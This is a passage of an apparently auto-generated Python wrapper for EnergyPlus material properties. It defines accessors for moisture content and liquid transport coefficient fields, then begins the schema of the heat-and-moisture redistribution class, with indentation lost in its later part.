        str: stored value, or None if the field is not set.
    """
    field_key = "Material Name"
    return self[field_key]

@material_name.setter
def material_name(self, value=None):
    """Setter for IDD field `Material Name`.

    Args:
        value (str): material name; None clears the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Material Name"
    self[field_key] = value
@property
def number_of_suction_points(self):
    """Getter for IDD field `Number of Suction points`.

    Count of suction / liquid transport coefficient coordinates
    (1 <= value <= 25).

    Returns:
        int: stored value, or None if the field is not set.
    """
    field_key = "Number of Suction points"
    return self[field_key]

@number_of_suction_points.setter
def number_of_suction_points(self, value=None):
    """Setter for IDD field `Number of Suction points`.

    Args:
        value (int): number of coordinate pairs; None clears the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Number of Suction points"
    self[field_key] = value
@property
def moisture_content_1(self):
    """Getter for IDD field `Moisture Content 1`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 1"
    return self[field_key]

@moisture_content_1.setter
def moisture_content_1(self, value=None):
    """Setter for IDD field `Moisture Content 1` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 1"
    self[field_key] = value
@property
def liquid_transport_coefficient_1(self):
    """Getter for IDD field `Liquid Transport Coefficient 1`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 1"
    return self[field_key]

@liquid_transport_coefficient_1.setter
def liquid_transport_coefficient_1(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 1` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 1"
    self[field_key] = value
@property
def moisture_content_2(self):
    """Getter for IDD field `Moisture Content 2`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 2"
    return self[field_key]

@moisture_content_2.setter
def moisture_content_2(self, value=None):
    """Setter for IDD field `Moisture Content 2` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 2"
    self[field_key] = value
@property
def liquid_transport_coefficient_2(self):
    """Getter for IDD field `Liquid Transport Coefficient 2`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 2"
    return self[field_key]

@liquid_transport_coefficient_2.setter
def liquid_transport_coefficient_2(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 2` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 2"
    self[field_key] = value
@property
def moisture_content_3(self):
    """Getter for IDD field `Moisture Content 3`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 3"
    return self[field_key]

@moisture_content_3.setter
def moisture_content_3(self, value=None):
    """Setter for IDD field `Moisture Content 3` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 3"
    self[field_key] = value
@property
def liquid_transport_coefficient_3(self):
    """Getter for IDD field `Liquid Transport Coefficient 3`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 3"
    return self[field_key]

@liquid_transport_coefficient_3.setter
def liquid_transport_coefficient_3(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 3` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 3"
    self[field_key] = value
@property
def moisture_content_4(self):
    """Getter for IDD field `Moisture Content 4`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 4"
    return self[field_key]

@moisture_content_4.setter
def moisture_content_4(self, value=None):
    """Setter for IDD field `Moisture Content 4` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 4"
    self[field_key] = value
@property
def liquid_transport_coefficient_4(self):
    """Getter for IDD field `Liquid Transport Coefficient 4`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 4"
    return self[field_key]

@liquid_transport_coefficient_4.setter
def liquid_transport_coefficient_4(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 4` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 4"
    self[field_key] = value
@property
def moisture_content_5(self):
    """Getter for IDD field `Moisture Content 5`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 5"
    return self[field_key]

@moisture_content_5.setter
def moisture_content_5(self, value=None):
    """Setter for IDD field `Moisture Content 5` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 5"
    self[field_key] = value
@property
def liquid_transport_coefficient_5(self):
    """Getter for IDD field `Liquid Transport Coefficient 5`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 5"
    return self[field_key]

@liquid_transport_coefficient_5.setter
def liquid_transport_coefficient_5(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 5` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 5"
    self[field_key] = value
@property
def moisture_content_6(self):
    """Getter for IDD field `Moisture Content 6`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 6"
    return self[field_key]

@moisture_content_6.setter
def moisture_content_6(self, value=None):
    """Setter for IDD field `Moisture Content 6` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 6"
    self[field_key] = value
@property
def liquid_transport_coefficient_6(self):
    """Getter for IDD field `Liquid Transport Coefficient 6`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 6"
    return self[field_key]

@liquid_transport_coefficient_6.setter
def liquid_transport_coefficient_6(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 6` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 6"
    self[field_key] = value
@property
def moisture_content_7(self):
    """Getter for IDD field `Moisture Content 7`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 7"
    return self[field_key]

@moisture_content_7.setter
def moisture_content_7(self, value=None):
    """Setter for IDD field `Moisture Content 7` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 7"
    self[field_key] = value
@property
def liquid_transport_coefficient_7(self):
    """Getter for IDD field `Liquid Transport Coefficient 7`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 7"
    return self[field_key]

@liquid_transport_coefficient_7.setter
def liquid_transport_coefficient_7(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 7` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 7"
    self[field_key] = value
@property
def moisture_content_8(self):
    """Getter for IDD field `Moisture Content 8`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 8"
    return self[field_key]

@moisture_content_8.setter
def moisture_content_8(self, value=None):
    """Setter for IDD field `Moisture Content 8` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 8"
    self[field_key] = value
@property
def liquid_transport_coefficient_8(self):
    """Getter for IDD field `Liquid Transport Coefficient 8`.

    Units: m2/s.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Liquid Transport Coefficient 8"
    return self[field_key]

@liquid_transport_coefficient_8.setter
def liquid_transport_coefficient_8(self, value=None):
    """Setter for IDD field `Liquid Transport Coefficient 8` (m2/s).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Liquid Transport Coefficient 8"
    self[field_key] = value
@property
def moisture_content_9(self):
"""field `Moisture Content 9`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_9` or None if not set
"""
return self["Moisture Content 9"]
@moisture_content_9.setter
def moisture_content_9(self, value=None):
"""Corresponds to IDD field `Moisture Content 9`"""
self["Moisture Content 9"] = value
@property
def liquid_transport_coefficient_9(self):
"""field `Liquid Transport Coefficient 9`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_9` or None if not set
"""
return self["Liquid Transport Coefficient 9"]
@liquid_transport_coefficient_9.setter
def liquid_transport_coefficient_9(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 9`"""
self["Liquid Transport Coefficient 9"] = value
@property
def moisture_content_10(self):
"""field `Moisture Content 10`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_10` or None if not set
"""
return self["Moisture Content 10"]
@moisture_content_10.setter
def moisture_content_10(self, value=None):
"""Corresponds to IDD field `Moisture Content 10`"""
self["Moisture Content 10"] = value
@property
def liquid_transport_coefficient_10(self):
"""field `Liquid Transport Coefficient 10`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_10` or None if not set
"""
return self["Liquid Transport Coefficient 10"]
@liquid_transport_coefficient_10.setter
def liquid_transport_coefficient_10(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 10`"""
self["Liquid Transport Coefficient 10"] = value
@property
def moisture_content_11(self):
"""field `Moisture Content 11`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_11` or None if not set
"""
return self["Moisture Content 11"]
@moisture_content_11.setter
def moisture_content_11(self, value=None):
"""Corresponds to IDD field `Moisture Content 11`"""
self["Moisture Content 11"] = value
@property
def liquid_transport_coefficient_11(self):
"""field `Liquid Transport Coefficient 11`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_11` or None if not set
"""
return self["Liquid Transport Coefficient 11"]
@liquid_transport_coefficient_11.setter
def liquid_transport_coefficient_11(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 11`"""
self["Liquid Transport Coefficient 11"] = value
@property
def moisture_content_12(self):
"""field `Moisture Content 12`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_12` or None if not set
"""
return self["Moisture Content 12"]
@moisture_content_12.setter
def moisture_content_12(self, value=None):
"""Corresponds to IDD field `Moisture Content 12`"""
self["Moisture Content 12"] = value
@property
def liquid_transport_coefficient_12(self):
"""field `Liquid Transport Coefficient 12`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_12` or None if not set
"""
return self["Liquid Transport Coefficient 12"]
@liquid_transport_coefficient_12.setter
def liquid_transport_coefficient_12(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 12`"""
self["Liquid Transport Coefficient 12"] = value
@property
def moisture_content_13(self):
    """float: IDD field `Moisture Content 13` in kg/m3, or None if unset."""
    return self["Moisture Content 13"]

@moisture_content_13.setter
def moisture_content_13(self, value=None):
    """Set IDD field `Moisture Content 13`; ValueError if `value` is invalid."""
    self["Moisture Content 13"] = value

@property
def liquid_transport_coefficient_13(self):
    """float: IDD field `Liquid Transport Coefficient 13` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 13"]

@liquid_transport_coefficient_13.setter
def liquid_transport_coefficient_13(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 13`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 13"] = value

@property
def moisture_content_14(self):
    """float: IDD field `Moisture Content 14` in kg/m3, or None if unset."""
    return self["Moisture Content 14"]

@moisture_content_14.setter
def moisture_content_14(self, value=None):
    """Set IDD field `Moisture Content 14`; ValueError if `value` is invalid."""
    self["Moisture Content 14"] = value

@property
def liquid_transport_coefficient_14(self):
    """float: IDD field `Liquid Transport Coefficient 14` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 14"]

@liquid_transport_coefficient_14.setter
def liquid_transport_coefficient_14(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 14`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 14"] = value

@property
def moisture_content_15(self):
    """float: IDD field `Moisture Content 15` in kg/m3, or None if unset."""
    return self["Moisture Content 15"]

@moisture_content_15.setter
def moisture_content_15(self, value=None):
    """Set IDD field `Moisture Content 15`; ValueError if `value` is invalid."""
    self["Moisture Content 15"] = value

@property
def liquid_transport_coefficient_15(self):
    """float: IDD field `Liquid Transport Coefficient 15` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 15"]

@liquid_transport_coefficient_15.setter
def liquid_transport_coefficient_15(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 15`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 15"] = value

@property
def moisture_content_16(self):
    """float: IDD field `Moisture Content 16` in kg/m3, or None if unset."""
    return self["Moisture Content 16"]

@moisture_content_16.setter
def moisture_content_16(self, value=None):
    """Set IDD field `Moisture Content 16`; ValueError if `value` is invalid."""
    self["Moisture Content 16"] = value

@property
def liquid_transport_coefficient_16(self):
    """float: IDD field `Liquid Transport Coefficient 16` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 16"]

@liquid_transport_coefficient_16.setter
def liquid_transport_coefficient_16(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 16`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 16"] = value

@property
def moisture_content_17(self):
    """float: IDD field `Moisture Content 17` in kg/m3, or None if unset."""
    return self["Moisture Content 17"]

@moisture_content_17.setter
def moisture_content_17(self, value=None):
    """Set IDD field `Moisture Content 17`; ValueError if `value` is invalid."""
    self["Moisture Content 17"] = value

@property
def liquid_transport_coefficient_17(self):
    """float: IDD field `Liquid Transport Coefficient 17` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 17"]

@liquid_transport_coefficient_17.setter
def liquid_transport_coefficient_17(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 17`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 17"] = value

@property
def moisture_content_18(self):
    """float: IDD field `Moisture Content 18` in kg/m3, or None if unset."""
    return self["Moisture Content 18"]

@moisture_content_18.setter
def moisture_content_18(self, value=None):
    """Set IDD field `Moisture Content 18`; ValueError if `value` is invalid."""
    self["Moisture Content 18"] = value

@property
def liquid_transport_coefficient_18(self):
    """float: IDD field `Liquid Transport Coefficient 18` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 18"]

@liquid_transport_coefficient_18.setter
def liquid_transport_coefficient_18(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 18`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 18"] = value
@property
def moisture_content_19(self):
    """float: IDD field `Moisture Content 19` in kg/m3, or None if unset."""
    return self["Moisture Content 19"]

@moisture_content_19.setter
def moisture_content_19(self, value=None):
    """Set IDD field `Moisture Content 19`; ValueError if `value` is invalid."""
    self["Moisture Content 19"] = value

@property
def liquid_transport_coefficient_19(self):
    """float: IDD field `Liquid Transport Coefficient 19` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 19"]

@liquid_transport_coefficient_19.setter
def liquid_transport_coefficient_19(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 19`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 19"] = value

@property
def moisture_content_20(self):
    """float: IDD field `Moisture Content 20` in kg/m3, or None if unset."""
    return self["Moisture Content 20"]

@moisture_content_20.setter
def moisture_content_20(self, value=None):
    """Set IDD field `Moisture Content 20`; ValueError if `value` is invalid."""
    self["Moisture Content 20"] = value

@property
def liquid_transport_coefficient_20(self):
    """float: IDD field `Liquid Transport Coefficient 20` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 20"]

@liquid_transport_coefficient_20.setter
def liquid_transport_coefficient_20(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 20`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 20"] = value

@property
def moisture_content_21(self):
    """float: IDD field `Moisture Content 21` in kg/m3, or None if unset."""
    return self["Moisture Content 21"]

@moisture_content_21.setter
def moisture_content_21(self, value=None):
    """Set IDD field `Moisture Content 21`; ValueError if `value` is invalid."""
    self["Moisture Content 21"] = value

@property
def liquid_transport_coefficient_21(self):
    """float: IDD field `Liquid Transport Coefficient 21` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 21"]

@liquid_transport_coefficient_21.setter
def liquid_transport_coefficient_21(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 21`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 21"] = value

@property
def moisture_content_22(self):
    """float: IDD field `Moisture Content 22` in kg/m3, or None if unset."""
    return self["Moisture Content 22"]

@moisture_content_22.setter
def moisture_content_22(self, value=None):
    """Set IDD field `Moisture Content 22`; ValueError if `value` is invalid."""
    self["Moisture Content 22"] = value

@property
def liquid_transport_coefficient_22(self):
    """float: IDD field `Liquid Transport Coefficient 22` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 22"]

@liquid_transport_coefficient_22.setter
def liquid_transport_coefficient_22(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 22`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 22"] = value

@property
def moisture_content_23(self):
    """float: IDD field `Moisture Content 23` in kg/m3, or None if unset."""
    return self["Moisture Content 23"]

@moisture_content_23.setter
def moisture_content_23(self, value=None):
    """Set IDD field `Moisture Content 23`; ValueError if `value` is invalid."""
    self["Moisture Content 23"] = value

@property
def liquid_transport_coefficient_23(self):
    """float: IDD field `Liquid Transport Coefficient 23` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 23"]

@liquid_transport_coefficient_23.setter
def liquid_transport_coefficient_23(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 23`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 23"] = value

@property
def moisture_content_24(self):
    """float: IDD field `Moisture Content 24` in kg/m3, or None if unset."""
    return self["Moisture Content 24"]

@moisture_content_24.setter
def moisture_content_24(self, value=None):
    """Set IDD field `Moisture Content 24`; ValueError if `value` is invalid."""
    self["Moisture Content 24"] = value

@property
def liquid_transport_coefficient_24(self):
    """float: IDD field `Liquid Transport Coefficient 24` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 24"]

@liquid_transport_coefficient_24.setter
def liquid_transport_coefficient_24(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 24`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 24"] = value
@property
def moisture_content_25(self):
    """float: IDD field `Moisture Content 25` in kg/m3, or None if unset."""
    return self["Moisture Content 25"]

@moisture_content_25.setter
def moisture_content_25(self, value=None):
    """Set IDD field `Moisture Content 25`; ValueError if `value` is invalid."""
    self["Moisture Content 25"] = value

@property
def liquid_transport_coefficient_25(self):
    """float: IDD field `Liquid Transport Coefficient 25` in m2/s, or None if unset."""
    return self["Liquid Transport Coefficient 25"]

@liquid_transport_coefficient_25.setter
def liquid_transport_coefficient_25(self, value=None):
    """Set IDD field `Liquid Transport Coefficient 25`; ValueError if `value` is invalid."""
    self["Liquid Transport Coefficient 25"] = value
class MaterialPropertyHeatAndMoistureTransferRedistribution(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Redistribution`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between liquid transport coefficient and moisture content
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of redistribution points',
{'name': u'Number of Redistribution points',
'pyname': u'number_of_redistribution_points',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'moisture content 1',
{'name': u'Moisture Content 1',
'pyname': u'moisture_content_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 1',
{'name': u'Liquid Transport Coefficient 1',
'pyname': u'liquid_transport_coefficient_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 2',
{'name': u'Moisture Content 2',
'pyname': u'moisture_content_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 2',
{'name': u'Liquid Transport Coefficient 2',
'pyname': u'liquid_transport_coefficient_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 3',
{'name': u'Moisture Content 3',
'pyname': u'moisture_content_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 3',
{'name': u'Liquid Transport Coefficient 3',
'pyname': u'liquid_transport_coefficient_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 4',
{'name': u'Moisture Content 4',
'pyname': u'moisture_content_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 4',
{'name': u'Liquid Transport Coefficient 4',
'pyname': u'liquid_transport_coefficient_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 5',
{'name': u'Moisture Content 5',
'pyname': u'moisture_content_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 5',
{'name': u'Liquid Transport Coefficient 5',
'pyname': u'liquid_transport_coefficient_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 6',
{'name': u'Moisture Content 6',
'pyname': u'moisture_content_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 6',
{'name': u'Liquid Transport Coefficient 6',
'pyname': u'liquid_transport_coefficient_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 7',
{'name': u'Moisture Content 7',
'pyname': u'moisture_content_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 7',
{'name': u'Liquid Transport Coefficient 7',
'pyname': u'liquid_transport_coefficient_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 8',
{'name': u'Moisture Content 8',
'pyname': u'moisture_content_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 8',
{'name': u'Liquid Transport Coefficient 8',
'pyname': u'liquid_transport_coefficient_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 9',
{'name': u'Moisture Content 9',
'pyname': u'moisture_content_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 9',
{'name': u'Liquid Transport Coefficient 9',
'pyname': u'liquid_transport_coefficient_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 10',
{'name': u'Moisture Content 10',
'pyname': u'moisture_content_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 10',
{'name': u'Liquid Transport Coefficient 10',
'pyname': u'liquid_transport_coefficient_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 11',
{'name': u'Moisture Content 11',
'pyname': u'moisture_content_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 11',
{'name': u'Liquid Transport Coefficient 11',
'pyname': u'liquid_transport_coefficient_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 12',
{'name': u'Moisture Content 12',
'pyname': u'moisture_content_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 12',
{'name': u'Liquid Transport Coefficient 12',
'pyname': u'liquid_transport_coefficient_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 13',
{'name': u'Moisture Content 13',
'pyname': u'moisture_content_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 13',
{'name': u'Liquid Transport Coefficient 13',
'pyname': u'liquid_transport_coefficient_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 14',
{'name': u'Moisture Content 14',
'pyname': u'moisture_content_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 14',
{'name': u'Liquid Transport Coefficient 14',
'pyname': u'liquid_transport_coefficient_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 15',
{'name': u'Moisture Content 15',
'pyname': u'moisture_content_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 15',
{'name': u'Liquid Transport Coefficient 15',
'pyname': u'liquid_transport_coefficient_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 16',
{'name': u'Moisture Content 16',
'pyname': u'moisture_content_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 16',
{'name': u'Liquid Transport Coefficient 16',
'pyname': u'liquid_transport_coefficient_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 17',
{'name': u'Moisture Content 17',
'pyname': u'moisture_content_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 17',
{'name': u'Liquid Transport Coefficient 17',
'pyname': u'liquid_transport_coefficient_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 18',
{'name': u'Moisture Content 18',
'pyname': u'moisture_content_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 18',
{'name': u'Liquid Transport Coefficient 18',
'pyname': u'liquid_transport_coefficient_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 19',
{'name': u'Moisture Content 19',
'pyname': u'moisture_content_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 19',
{'name': u'Liquid Transport Coefficient 19',
'pyname': u'liquid_transport_coefficient_19',
'required-field': False,
